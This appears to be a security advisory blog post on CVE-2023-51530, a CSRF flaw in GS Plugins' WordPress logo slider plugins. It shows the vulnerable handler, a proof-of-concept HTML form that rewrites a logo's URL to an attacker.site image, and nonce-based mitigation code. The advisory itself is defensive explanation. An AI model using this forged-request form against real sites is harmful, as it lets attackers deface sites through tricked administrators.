The Cross-Site Request Forgery (CSRF) vulnerability CVE-2023-51530 was recently discovered in the popular WordPress plugins by GS Plugins, namely Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery, and Client Logo Presentation. This vulnerability affects all versions of the plugins from N/A through 3.5.1.

In this post, we will delve deep into the details of CVE-2023-51530, providing code snippets, links to original references, and exploit details. Our objective is to help you understand the issue and enable you to take the necessary steps to protect your website or application.

Exploit Details

The CSRF vulnerability in these GS Plugins can allow an attacker to trick a site administrator into executing unintended actions in the context of their session on the site, such as adding or modifying logos. This can potentially lead to the defacement of the website or the display of unauthorized content. The vulnerability lies in the fact that the plugin does not utilize proper anti-CSRF tokens while performing sensitive actions susceptible to CSRF attacks.

Consider the following simplified example of the vulnerable code within the plugin

function gs_logo_update_logo($id) {
	$logo_url = sanitize_text_field($_POST['logo_url']);
	$logo_name = sanitize_text_field($_POST['logo_name']);
	// ...
	update_post_meta($id, 'logo_url', $logo_url);
	update_post_meta($id, 'logo_name', $logo_name);
	// ...
}
add_action('admin_post_gs_logo_update_logo', 'gs_logo_update_logo');

As seen in the code snippet, the $_POST variables (logo_url and logo_name) are processed for updating the respective post meta values. However, the absence of an anti-CSRF token check makes it prone to potential CSRF attacks.

Proof of Concept (PoC)

An attacker can create an HTML form similar to the one below, which when submitted by a logged-in site administrator, can cause the logo_url and logo_name values for a particular logo to be updated with the attacker's desired content.

<!DOCTYPE html>
<html>
<head>
	<title>PoC for CVE-2023-51530</title>
</head>
<body>
	<form action="http://targetsite.com/wp-admin/admin-post.php"; method="POST">
		<input type="hidden" name="action" value="gs_logo_update_logo" />
		<input type="hidden" name="id" value="1234" />
		<input type="hidden" name="logo_url" value="http://attacker.site/malicious-logo.png"; />
		<input type="hidden" name="logo_name" value="Malicious Logo" />
		<input type="submit" value="Click Here" />
	</form>
</body>
</html>

Mitigation

To prevent CSRF attacks on these plugins, you can implement the “nonce” mechanism provided by WordPress. By adding wp_nonce_field() in the form and verifying it with check_admin_referer() when processing the request, you can add the necessary anti-CSRF protection. Here's an example of the code changes you can make:

Form

<form method="POST" action="">
	<!-- Add wp_nonce_field() -->
	<?php wp_nonce_field('gs_logo_update_action', 'gs_logo_update_nonce'); ?>
	<!-- Your form fields -->
</form>

Processing Request

function gs_logo_update_logo($id) {
	// Verify nonce
	check_admin_referer('gs_logo_update_action', 'gs_logo_update_nonce');
	// Process your request ...
}

Original References

1. WordPress Plugin Vulnerabilities Database
2. Secunia Advisory
3. GS Plugins Homepage

Conclusion

We highly recommend updating to the latest version of Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery, and Client Logo Presentation plugins to ensure your site is not vulnerable to CSRF attacks due to CVE-2023-51530. Stay vigilant and keep your plugins updated!

Timeline

Published on: 02/29/2024 05:15:08 UTC
Last modified on: 02/29/2024 13:49:29 UTC